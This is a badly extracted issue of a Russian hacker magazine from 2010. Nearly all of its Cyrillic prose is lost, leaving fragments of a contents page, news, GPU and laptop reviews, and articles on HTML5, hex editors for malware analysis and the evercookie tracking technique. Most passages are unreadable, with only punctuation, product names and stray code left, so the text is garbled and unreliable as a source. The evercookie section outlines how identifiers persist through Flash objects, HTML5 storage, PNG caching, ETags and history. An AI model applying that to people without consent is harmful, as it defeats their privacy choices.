Вы находитесь на странице: 1из 148

.

50

x 11 () 2010

.
210
:

11 (142) 2010

/ ,

HTML5?
. 26

142

ZEUS
METERPRETER
CHAOS CONSTRUCTIONS 2010:


CISCO



TCL
. 64

INTRO


.
/ whitehat-
,

, ,
,
.
4000%, cyber crime
,
ring0 nginx,
$15k
30-40 .
-.
,

: 30 , 10.
:
,
,
.
,
,
,

- , ,
.
,
,
, , ,
, ,
.
,

.
5 :
1. cyber crime
2.

3.

4.
- .
.
nikitozz, . .
udalite.livejournal.com
http://vkontakte.ru/club10933209

CONTENT
MegaNews
004

FERRUM

MALWARE
076

- :

082

Zeus

Nod32, Avast, Avira:

086

Chaos Constructions 2010


016

018

Synology DSM?

092

BSD

020

096

ASUS U35Jc

NAS

PC_ZONE
025

026

HTML5:

032

Hex- vs. malware

036

Cookie,

102

Windows Filtering Platform

106

, ?

110

OpenGL iPhone

114

Portable-

LiveCD BSD-

3D- iPhone SDK

64-

SYN/ACK

040

Easy-Hack

118

044

122

050

126

055

Meterpreter

060

Windbg

064

Cisco

068

074

X-Tools

MSF

TCL

VMware View 4.5:


Linux

132

PSYCHO:

138

FAQ UNITED

141

144

WWW2

, : , ,
?

FAQ

8.5

web-

BANK
CLIENT

050

076

- :

Nod32, Avast, Avira:

082

106

Zeus

, ?

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>



> Gameland TV

(rumyantseva@gameland.ru)
>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)

>

(korenfeld@gameland.ru)
>


/:

/ .: (495) 935-4034, : (495) 780-8824


>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)

> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

Mifrill mifrill@real.xakep.ru

MEGANEWS

PS3
, Sony PlayStaiton 3,
, ,
USB- . . ( ),
Sony ,
, , 3.42. ,
: .
USB- , .
, ,
... . Nokia N900,
Palm Pre, Android , ,
Apple.
, ? :
TI-84 Plus :). , ,
- http://brandonw.net/ps3jb
FAQ. ,
http://psx-scene.com.

Forbs,
. 17- .
$54 .

,
, , . ,
IT- , DEFCON,
BlackHat HITB. ,
... . , , ,
, MalCon
(www.malcon.org). FAQ MalCon . ,
, -
IT-
. , ,
, , , . FAQ
, ,
:).
.

004

X 11 /142/ 10

MEGANEWS

-
IT 64- Linux- root-,

(
32- ). , .

,
! ,
2008 ,
, , .

64- . ,

seclists.org/
fulldisclosure/2010/Sep/268. Ubuntu, Slackware,
Gentoo, Mandriva, openSUSE, Fedora Debian.
RHEL CentOS 3
4 ( 5.x!), RedHat,
,
.

Open Office .
12 .

APP STORE INTEL


IDF (Intel Developer Forum) 2010
Intel , AppUp
Atom. , - , , ,
www.appup.com. ,
,
AppUp Center .
, Intel : AppUp
Center . , AppUp ,
( 23 000 ).
, 24- ,
, .
Windows MeeGo Linux, ( , ).

Intel
,
Atom .

DELL
Dell
,
IDF 2010 Dell Inspiron Duo.

,
Inspiron
Duo , (!)
, .
180 ,
, . Windows 7
, ,
: Intel Atom
N550 (1,5 ), 2 , HDD
SSD 160 32 . , ,
Dell ,
.

006

X 11 /142/ 10

MEGANEWS

3D
, Apple,
. , .
, ,
,
3D. i-Station
Z3D, , , 7-
(800x480) . ,
, ,
3D , , . Google Android 2.1,
, Z3D : Telechips 8901 720 , 256 , Wi-Fi 802.11b/g Bluetooth, FM-, TV-,

Full-HD. :
32 , 64 .
, $500.
.

PandaLabs , 25%
USB-.

IOS


Apple,
. Apple
4.1
iOS,

. Apple -
:

, , , ,
, .
, - . ,
Dev-Team, ,
4.0.2. , 4.0.2 , :). Dev-Team

, iOS 4.1.
,
ROM! Dev-Team , Apple
,
.

GoogleTV.
, YouTube,
, .

2.0

,
.
DEMO
Dynamics.
: MultiAccount Hidden.
,
. , MultiAccount ,
.
.
, ,
. (Hidden)

008

. 10 16 ,
.
, (
).
,
. , , ,
.
X 11 /142/ 10

MEGANEWS

$50

, Engaget
Intel . , :
, . ,
Intel ,
Upgrade Card
.
Intel G6951 ( ,
Hyper-Threading, -).
50
. - , Intel

,
:).

id Software 5
: Doom, Quake, Quake 2, Wolfenstein, Return to Castle Wolfenstein

HDCP
HDCP High-bandwidth Digital
Content Protection,
, Intel. HDCP

,
DVI, DisplayPort, HDMI, GVIF UDI.
.
,
HDPC Master Key HDMI, Intel
, , . Blu-ray-,


.

010


, SMS, e-mail, Twitter .
QWERTY , qwerty-
-.
TFT- 2.4" 320240.
: Li-Ion-,
760 , 6,2 . QWERTY
Bluetooth 2.0, USB microSD 16 (
16 ). FM-, ,
Java. 3G, WiFi
, .
3490 3990 ( , )! , QWERTY
.

, -,
-
,
source- sink-
.
Blu-ray-
HD- ( )
. , Intel ,
,
-
,
HDCP- HDCP-.
, , Intel

-

.
, HDMI Master Key
rudd-o.com/en/monopolies-of-the-mind/
the-hdcp-master-key.
X 11 /142/ 10


N- NOKIA
.

, -,
.

NOKIA N8,
SYMBIAN^3? .

, , , ,
. N8 ,
, Nokia.
-
, . (113,559,1212,9)
135 ,
. ,
. Nokia
, . ,
, .
, - .

3.5" 640360
, AMOLED 16,7 . .
N8 ,
. Nokia,
. , . ,
: N8 .
ARM11 680 .
Nokia, N8 256
128 . 16 ,
mircoSD 32 . .

Symbian^3

N8 Symbian^3.

. :
,
.
, .
Symbian^3 .
.
, (, Wi-Fi ), ,
RSS, . .

, ,
. ,
. 12 (!)
Carl Zeiss. 720p,
:
. N8
.
HDMI Mini, HDMI. , . ,
HDTV- 720p 5.1 . , N8
OpenGL 2.0,
: avi, mkv ..

. . -

Nokia N8:

, N8
Symbian . Symbian^3
.
Ovi.

. Wi-Fi
802.11n Bluetooth 3.0.
390
720 , .
N8
12 .

11

MEGANEWS


- , Apple
.
iPod Shuffle, Nano Touch,
. ,
Nano ( 46%
42%), Clickwheel, ,
.
- Retina 1.54" . ,
Apple , iPod Shuffle Nano
, , .
, ,
(
). Nano ,
$149 8 $179 16 .
iPod Touch.
iPhone, -, , , A4 Retina (IPS-
960x640 ), , iPhone 4. Touch HD-. ,
, : 8
$229, 32 $299 64 $399
.
. iPod Shuffle,
,
,
,
. Nano

VoiceOver.

: -

15 . Shuffle
2 . $49.
iPod Apple Apple TV. ,
A4. Apple
TV ,
iTunes,
Netflix, YouTube, Flickr MobileMe.


, iPad, iPhone
iPod Touch,
, ,
.


Apple TV. $99.

9 Google 24 .
.


,
, .
,

012

, .


(Combating Online Infringement and Counterfeits Act).
,

.

,
torrents.ru rutracker.org.
, ,
.
, , : , .com, .net .org ,
. ,
,
- (
).
X 11 /142/ 10

,
Damballa,
,
. ,
, -
. Damballa , IMDDOS. ,
IMDDOS 10 000. ,
IMDDOS .
, ,


,


,
, , ,
DDoS . .
, : http://www.imddos.org :).

, Network box, ,
(13,74%)
(11%).

!
,
, ,
. ,

, , 1273. ,
, 1273
.
:

.
,

, . ,
,
.

, , ,
(c, , ,
?). , 1270
: , ,
.
10 . 5 . .
. , ,
,
,
. ,
.

! 5.0 Skype -
,
P2P- VoIP-

. .
. , ,

SMS
. ,
IT
( ).
, ,
,
, .
, ,
.
,
.
X 11 /142/ 10

500 .
, , , (
, ).
,
20 , 10
, ,
, , ,
,
SMS. ,
SMS 300 1000 ,
,
.

159 () . 273 (
).

013

MEGANEWS

XSS-
TWITTER

Twitter,
( ) ,
.
,
Twitter.

( ).
,
, -

.

. XSS-

JavaScript,
onMouseOver.
(,
),
, ,
. ,

,

100 .
. ,
Twitter
, -
, , , .

ARM-
Marvell ,


ARM-
USB 3.0. ,
Marvell Armada 628. 1,5 , ,
1 ,
LP-DDR2 DDR3 ( 533 ). ;
, Armada 628

USB 3.0. ,
ARM v7 MP ,
, .
, , .
,
. , Android,
Linux, Windows Mobile RIM OS,
Armada 628 2011 .

IBM,
Sun 24% .
Microsoft 23,3% Mozilla 21,3%.

ANDROID MARKET
IT- Google.
Android OS
Android Market . ,
( )
,
. Android Market 80 000 ,
61,4% , .
, Google ,
, Android
12 (
14 ), ,
, , , .
Google ,
.

014

X 11 /142/ 10

FACEBOOK-


(Ronald K. Noble),
INTERPOL
Information Security Conference. ,
, ,
, Facebook
, . ,
DDoS-, , , ,
.
. Security

Incident Response Team



Facebook-,
.
,
,
Infra Red.
,

, ,
.
,

. ?..

-
Digg 34%,
26%.

X 09 /140/ 10

015

FERRUM


ASUS U35Jc

13
. ,
. ,
.
- Visual Studio,
. : 13
ASUS U35Jc.

ASUS U35Jc . , ,

, , :
, ,
, .
, -

016

.
, ,
.
, ,

,
.
13.3" LED 1366768 , -

720p-. ,
.
, , ,
. ,
,
.
, .
X 11 /142/ 10

: Intel Core i3-370M 2,4 GHz


: 2.5 / 3 Mb L2 Cache
: 2
: 640
: 25x322x233
: 1.9
: 13.3 1,366x768
: nVidia GeForce 310M, 1024 , . : Intel GMA HD
: Intel High Definition Audio
: LAN 10/100/1000
: Bluetooth 2.1 + EDR, WiFi (802.11a/b/g/n)
: 3xUSB(2.0), Kensington security, Line-out, HDMI, Mic-in, VGA
: Card Reader (SD/MMC/MS/Pro/xD)
: Li-Ion 5600 ( 8.0 )

.
, -
, . ,
.
, , Wi-Fi-.
,
.
, , :). . , . - ASUS Express Gate
(, , , ,
..) .

ASUS U35Jc Mobile Intel


HM55 Express. , ASUS U35Jc
Intel Core i3
Core i5 2,4 GHz. Core i5
Intel Turbo Boost ,
. ,
. , ASUS
Super Hybrid Engine (SHE),
, 10%.

DDR3 2 4 , 320
640 .
, 3 USB-
. :
(nVidia GeForce 310M) (Intel GMA HD). nVidia Optimus
. , ,
.
,
8 . , . 5600
? , Battery Eater (batteryeater.com).
,
. ,
.
, ?
, : GeForce 310M ,
Call Of Duty 4 . , , .
X 11 /142/ 10

nVidia CUDA,
. ,

, CUDA, . ,
,
.
Extreme GPU Bruteforcer (www.insidepro.com/eng/egb.
shtml). , MD5-
411 ,
.

, : , . U35Jc
, :
, , . , , nVidia Optimus
(,
802.11n).
(Bluetooth, WiFi, LAN)
. Altec Lansing
SRS Premium Sound
,
. , , ,
,
.

ASUS
trendclub.ru. Trend Club , . Trend Club ,
, . Trend Club Intel ASUS
.
Intel,
, , ,
.
Intel Web-
Intel http://www.intel.ru, http://blogs.intel.com. Intel www.intel.ru/rating.

017

FERRUM

Synology
DSM?
NAS

NAS Synology, DSM


Synology,
. , Linux,
RAID,
. Synology DS210+ ,
. NAS
,
.
, NAS ,
, . ,

.
NAS,
.

, NAS.
,

Synology Disk Station Manager.

Torrent-

, NAS
. ,
,

018
074

, NAS?
-, BitTorrent-
Linux ,
. ...
:
NAS Synology, DS210+, Download Station.
, ,
-.
,
NAS,
.
NAS .
(BitTorrent,
HTTP, FTP), ,
,

. , ,
Download Station 2 ,

. ?
NAS -
,
.
! :) , ,
, ,

,
.

,
IP-,

X 11 /142/ 10

- NAS

DSM 2.3
. IP- ,
.
, Dynamic DNS-. ,
,
(, myserver.
dyndns.org) IP- .
,
DDNS-
IP-, . DDNS , NAS Synology
. DDNS-
(, dyndns.org) DSM.
NAS
IP,
, DDNS-.
, ,
, ,
. .

,
NAS - .
NAS , .
Synology DS210+, Web Station.
DSM -,
PHP- MySQL. Synology
, ,
,
Web Station. DS210+ , -
, , . ,
, ,
( www.synology.com/
enu/apps/index.php).
Webalizer.
MySQL phpMyAdmin.
psk-,
DSM
.


, . , Synology
.
, . - (, )
forum.synology.com , X 11 /142/ 10

PSK-. The Underground


(Modders here!), , .
: ,
, ( Subversion), ..
, PSK
.
IPGK. , IPGK-. ,
, mc
.
, , .


, , NAS Synology Photo Station.
-, , ( , photo).

,
.
: , , , . ,
NAS USB-,

.
IP-, .
IP- , IP-, NAS. , NAS Synology,

.
Synology Disk Station Manager - Surveillance Station. ,
, USB -
IP-.
Wi-Fi ,
, , :
, , .
, Disk Station Manager
2.3. , - DSM 3.0, ,
28- 2010
DSM 3.0 . ,
.
NAS Synology.

019

FERRUM


, : 2.66, INTEL CORE I5-750

HIS HD 5850 ICOOLER V


HIS HD 5870 ICOOLER V TURBO X
HIS HD 5970
INNO3D GEFORCE GTX 470
INNO3D GEFORCE GTX 470 HAWK
INNO3D ICHILL BLACK SERIES GEFORCE GTX 480

: GIGABYTE GA-H55N-USB3
, : 22, OCZ DDR3 PC3-12800, 1600 , GOLD
EDITION
, : 80, SAMSUNG 80G SPINPOINT S166
SATA
, : 1000, CORSAIR HX1000W
: WINDOWS 7


, , ,
. ,
, ,

.

, , ,
. 3DMark 2003 Heaven Dragon ( DirectX 11,
). 19201080 ,
, .
(
19201080 . Resident Evil 5 S.T.A.L.K.E.R.:
, ,
RE5 , .
Dark Void, Batman: Arkham Asylum Street Fighter IV
AF .

Fermi,
NVIDIA, . ,
NVIDIA GeForce GTX 480 GPU 700 , 1401 , 924 (3696) .
, , 384 . -

020

, . ,
105 , .
, , 600 ,
, .
. NVIDIA GeForce GTX 470.
, ,
. 320 .
NVIDIA GeForce GTX 465
256-. , .
, NVIDIA , Hi-End-, . ,
, .
, , , ATI
PhysX, , ,
.

X 11 /142/ 10

10000 .

13500 .

HIS Radeon HD 5850


iCooler V

HIS Radeon HD 5870


iCooler V Turbo X

, : 40
, : 725
, : 1000 (4000)
, : 1024
, : 256
: GDDR5
DIRECTX: 11

,
. ,
( , ).
.
, . ATI Radeon HD 5850,
(725 1000 ). ,
ATI . , , ,
, ,
-.
. .

NVIDIA, ,
- HIS Radeon HD 5850
iCooler V.

X 11 /142/ 10

, : 40
, : 900
, : 1225 (4900)
, : 1024
, : 256
: GDDR5
DIRECTX: 11

, , HIS. ,
: (2,15 ), (1600)
(80). ,
-
50 ,
. , (
) . , HIS
Radeon HD 5870 iCooler V Turbo X , . , ,
, - . HIS
Radeon HD 5970 , ,
.

.
, . ,
, NVIDIA PhysX
?

021

FERRUM

21000.

HIS Radeon
HD 5970
:
, : 40
, : 725
, : 1000 (4000)
, : 2X1024
, : 2X256
: GDDR5
DIRECTX: 11

, ( )
, . , ,
ATI. ,
.
, .
, , ,
, .
CrossFire

,
. ,
, ,
. ,
,
.

022

11000 .

Inno3D GeForce
GTX 470
:
, : 40
, : 607
, : 837 (3348)
, : 1280
, : 320
: GDDR5
DIRECTX: 11

,
?
, ,
, . ,
, . ,
320- ,
1280 GDDR5 ,
. , , ( , ,
, ),
. DirectX 11- Heaven Dragon.

. -,
90 . ,
,
Inno3D GeForce GTX 470 .
, .
X 11 /142/ 10

Inno3D GeForce
GTX 470 HAWK
:
, : 40
, : 630
, : 873 (3492)
, : 1280
, : 320
: GDDR5
DIRECTX: 11

, ,
- .
, ,
FPS . 68
!
, 23 , 36 45 .

, , ,
Inno3D GeForce GTX 470.
26 ,
.
. ,

.

-
. ,
X 11 /142/ 10

Inno3D iChiLL Black Series


GeForce GTX 480
:
, : 40
, : 720
, : 930 (3720)
, : 1536
, : 384
: GDDR5
DIRECTX: 11

,
. ,
Inno3D, Inno3D iChiLL Black Series GeForce
GTX 480.
.
, , 65 ,
.
, .

,
. . ,
.

. , ,
, , .
HIS Radeon HD 5970 ,
Inno3D GeForce GTX 470.z

023

FERRUM

3DMark03,

Heaven Dragon, FPS

HIS HD 5850 iCooler V


HIS HD 5870 iCooler V Turbo X
HIS HD 5970
Inno3D GeForce GTX 470
Inno3D GeForce GTX 470 HAWK
Inno3D iChiLL Black Series
GeForce GTX 480

HIS HD 5850 iCooler V


HIS HD 5870 iCooler V Turbo X
HIS HD 5970
Inno3D GeForce GTX 470
Inno3D GeForce GTX 470 HAWK
Inno3D iChiLL Black Series
GeForce GTX 480

2000

4000

6000

8000

10000

12000

10

20

30

40

50

60

DirectX 11 , ,

Street Fighter IV, FPS

S.T.A.L.K.E.R.: , FPS

HIS HD 5850 iCooler V


HIS HD 5870 iCooler V Turbo X
HIS HD 5970
Inno3D GeForce GTX 470
Inno3D GeForce GTX 470 HAWK
Inno3D iChiLL Black Series
GeForce GTX 480

HIS HD 5850 iCooler V


HIS HD 5870 iCooler V Turbo X
HIS HD 5970
Inno3D GeForce GTX 470
Inno3D GeForce GTX 470 HAWK
Inno3D iChiLL Black Series
GeForce GTX 480

50

100

150

200

250

300

350

10

20

30

40

50

60

70

,
ATI Radeon

Dark Void, FPS

Resident Evil 5, FPS

HIS HD 5850 iCooler V


HIS HD 5870 iCooler V Turbo X

HIS HD 5850 iCooler V


HIS HD 5870 iCooler V Turbo X

HIS HD 5870
Inno3D GeForce GTX 470
Inno3D GeForce GTX 470 HAWK
Inno3D Black Series
GeForce GTX 480

HIS HD 5870
Inno3D GeForce GTX 470
Inno3D GeForce GTX 470 HAWK
Inno3D Black Series
GeForce GTX 480
0

50

100

150

200

250

ATI HIS

350

85

90

95

100

80

105

-
HIS Radeon HD 5970

Batman: Arkham Asylum, FPS


HIS HD 5850 iCooler V
HIS HD 5870 iCooler V Turbo X
HIS HD 5870
Inno3D GeForce GTX 470
Inno3D GeForce GTX 470 HAWK
Inno3D Black Series
GeForce GTX 480
0

50

100

150

200

250

024

70

X 11 /142/ 10

PC_ZONE
Step twitter.com/stepah

Portable-
][
Portable , ,
,
,
,
.
Thinstall.
VMware,

VMware ThinApp.
, ThinApp
,
. ,

. , ; ,
, ,
,
.

.EXE-.

,
, DDL,
,
,
.
,

. , ThinApp
,
$6050. ,
? , , ,
,

.
Cameyo (www.cameyo.com)
, ThinApp, . ,
VMware .
,
,
Cameyo.
1,5 :
,
.
(Capture installation)
(snapshot)

025

,

.
snapshot , Cameyo ,
Portable. Opera,
Flash- ,
Java-. ,
, ;

( ).
,
Install done.
Cameyo
, ,
, Portable-.
,
Package successfully
created.
, , .
EXE
Windows- ,
, . -
. ,
,

. ,
Opera 10.62 139 .
:
, ,
Cameyo ,

. ,
Opera Dropbox,
15 , . , ,
Cameyo, ( )
Edit existing package.
Files Registry ,
.

, - .
General Isolation Mode.
Portable-

.

Full Access,
, .
Cameyo, SDK .
API ,
.
,
, , .. ,
. z

Portable-
Comeyo

,
Install done


X 11 /142/ 10

PC_ZONE

HTML5

HTML5

HTML5:

,
.
, , ,
- ,
.
HTML5.
, ! ,
, ,
,
. : , , .
, ,
, .
HTML
,
-, , . HTML4 ,
,
. Macromedia, Adobe,
Shockwave, Flash. Flash ,

026

, , - .
JavaScript Flash (, -
),
. , YouTube, Facebook
. ,

.

HTML
: ,
, Flash/
Silverlight/JavaFX. -

X 11 /142/ 10

, 3D,

canvas
.
, , .
Flash Silverlight.
HTML4.
, HTML5.
,
,
. ,
.
, 2D- 3D-, , ,

JavaScript.
- , . HTML5
. HTML ,
CSS JavaScript.
,
(-) .
, -
, ,
.
(, YouTube).
JavaScript Flash ,
,
(, ,
..). . HTML5 ,
,
<video> . , .
, , , HTML5.

HTML5, ?

- ,
,
JPEG/GIF/PNG,
. Flash
, ,
.
HTML ,
. ,
X 11 /142/ 10

HTML5
. Canvas HTML5. ?
, ,
, , , .. JavaScript.
DOS , , ,

. - .
, , Flash, -, .
canvas:
function draw(){
var canvas = document.getElementById("canvas");
if (canvas.getContext) {
var ctx = canvas.getContext("2d");
ctx.fillStyle = "rgb(200,0,0)";
ctx.fillRect (10, 10, 55, 50);
ctx.fillStyle = "rgba(0, 0, 200, 0.5)";
ctx.fillRect (30, 30, 55, 50);
}
}
<body onload="draw();">
<canvas id="canvas" width="150" height="150">
</canvas>
</body>

Canvas, , .
,
VML Microsoft
SVG Mozilla Safari.
, .
Canvas . ,
,
.
, GPU. Google Chrome IE
9beta canvas DirectX API.

, ,

- , ,
- ,

027

PC_ZONE

. -...

,
HTML5 CSS3
. , IE
.
JavaScript-,
, .
. , ,
. Cookies
, ,
,
.
4 ( )?
HTTP-,
.
WebStorage DOM Storage , . , -,
,
( ,
).
, ,
,
. ? , IE
10 , Firefox 5 . ,
Microsoft
, , ,
. , IE8 ,
, ,
. session,
( ,
), local , , ( ).
, ,
NoSQL ( )
. (set), (get) (remove)
, ,
, .
(clear) (length).
,
JavaScript. , :
window.localStorage[myfriend] = JSON.stringify(
[{name:,email:vasja@xakep.ru}, {name:Alex,
email:aleks@xakep.ru}]);

028

HTML5?
HTML5 ,
.
-, , ,
. , , , ,
, !
HTML5 . ,
, ,
HTML5- ,
. , - Flash, -
CSS, .
.
,
,
,
HTML5 Boilerplate,

. ,
,
Modernizr,
API
body. ,
, .

Raphael, , , .
SVG, VML,
. canvas
exCanvas, IE7
, .
Sessionstorage ( ,
WebStorage API)
jStore ( jQuery), API,
.
YouTube (, , PornTube )
Video for Everybody,
<video> JS- Flash. ?
WebForms2, .
WebSocket , . web-sockets-js
JS- Flash. ,
.
, easyXDM.
CSS 3,
selectivizr css3pie, .
X 11 /142/ 10

<html>5doctor
HTML

.
W3C, HTML5. ,
, ( )
, ,
Web SQL Database
SQL ( SQLite).

? , !

,
C
, , .

. , , . , , ?
, ,
.
, . ,
, :
. HTML5
offline/online, .
, ,
,

(DOM Storage)
, ,
, ,
.
,
, , HTML5
!
document.body.addEventListener("offline",
function () {
alert(', ,
!'));
}, false);

,
, ,
? .
application cache offline
resource. , ()
, ,
. X 11 /142/ 10

CSS3 !

,
. , ,


. Firefox 3.5 .

Web Workers ,

,
, 4-
8 !
Flash, . : JavaScript
.
(
Chrome,
). ,
,

. ,
XMLHTTPRequest,
,
. ,
, ,
, ?
,
.
, , .
WebWorkers,
Google Gears. ,
(
),
,
, DOM-
. , ( ).
DOM-
, .

,

HTTP://WWW
links
,

,

HTML5:
www.html5rocks.com
3D
WebGL:
learningwebgl.com/
blog
HTML5
CSS 3
:
www.findmebyip.com/
litmus

HTML5:
www.w3schools.
com/html5/html5_
reference.asp

WebWorkers:
http://webo.in/
articles/all/2009/25computing-with-webworkers

029

PC_ZONE

Modernizr ,
HTML5

Google Chrome 3D WebGL

( JSON-).
:


, , FileReaderAPI,
(,
).
Firefox, API
.
, , , WebSockets (
, TCP-),
( ). ,
(
IE9). WebSockets
,

- .
90- 3D- .
( VRML), ,
(Blink 3D, Wildtangent)
Java (Java3D) Flash.
, - ,
( ) ? .
OpenGL (
, Doom Quake)
API
JavaScript. WebGL, Chrome. , canvas, : , .
.
API
3D JavaScript !
; ,
, .
, ,
CopperLicht.

var worker = new Worker("my_xaking_script.js");


worker.onmessage = function(event) {
alert(Computing finished, result: + event.
data)
};
worker.postMessage("5");

( my_xaking_script.js) JS,
DOM,
, onmessage, , .
postMessage,
.
,
, RPG-, ,
Flash .
,
, ,
(,
JavaScript NodeJS). Firefox,
JS, WebWorker .
, JavaScript-
, jQuery, C JavaScript SHA-1 ( , Ruby- Engine Yard).
DVD, . ,
, .

, ?

, HTML5 ? ,
. , - (Drag-n-Drop)
. IE (
-?), - , .
HTML5 , Drag-n-Drop
, DOM- CSS .
,
, .
Google Chrome,
Gmail DragnDrop. ,

030

HTML5 . , , , C++ . , , ,
.
, ,
. HTML5,
-.z
X 11 /142/ 10

:
?


PlayFast

. . . Playfast, ,
. ,
,
. ? ?

. -, -

: , .
-,
, . , -,
, ,

5-15% .
.
, ?

,
, .
Playfast ,
. ,
,
PlayFast.
. ,
, ( ,
). ,
,
, .
, ,
.
PlayFast .
, ,
. (Windows Vista/XP/7).
-
, , ,
.

, .
Playfast .
,
. , .

.
,
( ).

,
. ,
X 11 /142/ 10

PlayFast
.

.
, , ,
,
.
, ,
.
-.
,
( ),
, .
, .
, : ,
.

PlayFast- -, .
,
.
- ,
, , . ,
, , . -
,
Playfast. ,
. .z

031

PC_ZONE

DVD


DVD-

Hex-
vs. malware




hex. , ,
,

. ,
,
, . .
HEX-
,
. . .
, ,
, ,
. -

032

ASCII Unicode , ,
. ,
,
.

(, PDF).

X 11 /142/ 10

INFO

info

010 Editor:

Hex Editor Neo:

McAfee FileInsight

. Freeware ,
HEX-,
.
. Hex Editor
Neo ,
.
, ,
. ,
NTFS-, , ,
.
,
VBScript JavaScript. ,
,
x86, x64, .NET-!
,
. ,
, FileInsight? , . FileInsight
.
, , , Hex
Editor Neo
ASCII Unicode-.
x86
, . .

FileInsight hex- Windows


McAfee Labs. , , ,
,
. ,
.
, FileInsight Windows (PE ),
OLE- Microsoft Office. ,
x86 .
,
, FileInsight
.
,
. ,
,
. :
struct ANIHeader {
DWORD cbSizeOf; // Num bytes in AniHeader
DWORD cFrames; // Number of unique Icons
DWORD cSteps;
// Number of Blits
};


. ,
.
, , (xor, add, shift, Base64 ..):
-.
,
,
-, .
JavaScript
Python, . ,
FileInsight
, . ,
400-500 ,
Failed to open document.

Hex Editor Neo


HDD Software: X 11 /142/ 10

FlexHex

FlexHex hex-
Heaventools Software, , Hex Editor Neo.
, ,
.
, OLE-,
NTFS-.
, FlexHex ,
. ,

: , -
.
. FlexHex
, (undo-list )! FlexHex

, HEX-


?
.

-
hexpaste.

(, hexpaste.com/
WvwX04eV),
- .

.


AJAX',
,
,
.

HTTP://WWW
links

FileInsight:
vil.nai.com/vil/
averttools.aspx
Hex Editor Neo:
www.hhdsoftware.
com/free-hex-editor
FlexHex:
www.flexhex.com
010 Editor:
www.sweetscape.
com/010editor
Hiew:
www.hiew.ru
Radare:
radare.nopcode.org/
new

033

PC_ZONE

FlexHEX

hex-
McAffee Labs

Hiew

, ASCII Unicode-.
,

. hex-,
- FileInsight. OLE-, . OLE, The docfile has been corrupted.

010 Editor

010 Editor ,
SweetScape Software.
, :
,
,
,
( 140 ).
010 Editor , .
,
(
Binary Templates). . ,
.
.
(PE
), - Windows (LNK), Zip-,
Java- .
,
Didier Stevens 010 Editor PDF.
PDF-, ,
-. , C- , ASCII, EBCDIC, Unicode-

.

Hiew

Hiew, ,
. ,
. , , .
(PE), Linux (ELF).
x86-64 .
ARM. ,

. ,
API (Hiew Extrenal Modules).

034

radare hex- unix


, Hiew DOS , . .

Radare

Radare Unix-,
HEX-. hex-
(radare) .
,
(ELF), (PE).
Radare
(radiff) /.
(rasc).

. , ,
GUI-
, ,
. ,
, ,
Python-.

hex-, .
FileInsight,
( ) . 010 Editor
, PDF. -, .
; , , . Unix, , , Radare. ,
- , .
Hiew, , , ,
. , Hiew
,
( ). Hex Editor Neo,
, x86, x64 .NET . z
X 11 /142/ 10


DNS?

,
DNS
- .
, 53
, DNS.
www.xakep.ru,
IP- . .
DNS.

DNS

SkyDNS (www.skydns.ru) , DNS


.
-
. ?
,
DNS ( ,
). SkyDNS, ,
. DNS
.
, , ,
, .
SkyDNS
. , ,
, -.
, DNS
, - (
, DNS
), . ,
, SkyDNS.
: ,
, . ,
,
.

( 5 ),
, . , , : - , .
- .
, SkyDNS , ,
, . ,
X 11 /142/ 10


. !
, ,
, .
:
, .

, :).

-,
, .
,
,
SkyDNS . ,
SkyDNS ,
, , ADSL-, .
IP-,
( ), .
, ,
, ( !).

. z

035

PC_ZONE
Step step@glc.ru

DVD

evercookie

Cookie,

Cookies , -
,
. ,
, . .

, VPN,
HTTP-,
, ,
, -
, . , ,
-
.
, -
, ,
. , -
? .
.

, . Cookies ( . )
, . (
), ,

036

cookies,
- . , - cookies
,
, .
, - .
. , - HTTP-.
, www.example.org/index.html
www.example.org
:
GET /index.html HTTP/1.1
Host: www.example.org

,
, HTTP-.
:
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: name=value
X 11 /142/ 10

Flash

cookie evercookie

Set-cookie,
name=value ( = )
:

, -
, .
- Flash cookie
( , 100 ), ,
.
LSO
. :

, Flash-? ,
. ,
, FlashCookiesView (www.nirsoft.
net/utils/flash_cookies_view.html) ,
Flash.
,
,
( ).

GET /spec.html HTTP/1.1


Host: www.example.org
Cookie: name=value
Accept: */*

.
,
. ,
,
. ( ),
.
, ,
.
,
. , ,
,
...
, ,
.. - ,
,
.
.

Flash-

, HTTP ,
, ,
. ,

Flash ( ,
). LSO
(Local Shared Objects) cookies
,
.
(
), :
- Flash-
( cookie, ). ,
, , , X 11 /142/ 10

LSO
- , ,
( ), . , HTML5 (Session Storage, Local Storage, Global
Storage, Database Storage via SQLite),
HTML5: .
Samy Kamkar.
JavaScript-
evercookie, ,
.
- : ?.
: ,
, .
Tracking
cookies
. Evercookie
.
, evercookie
: HTTP, LSO, HTML5. ,
,

. : PNG-,
history ,
ETag, userData Internet
Explorer , - .

INFO

info

flash cookie,
.


www.macromedia.
com/support/
documentation/ru/
flashplayer/help/
settings_manager07.
html.
,
LSO.

037

PC_ZONE

,

evercookie
, ,
http://samy.pl/evercookie.
Click to create an evercookie,
. ,
. , :
, ?. , ? , .
Click to rediscover cookies. WTF?
- , .
? ? .

PNG

, Evercookie,
PNG. evercookie , evercookie_png.php HTTP
, ,
.
PHP-, PNG-,
RGB ()
. PNG- :
20 .
, evercookie HTTP-,
PHP-, . , , PNG .
HTTP- 304 Not Modified,
. HTML5 Canvas.
, evercookie
Canvas, RGB- , , ,
. , .

Web History

. , evercookie Base64 , .
, ,
bcde Base64. URL:
google.com/evercookie/cache/b
google.com/evercookie/cache/bc

038

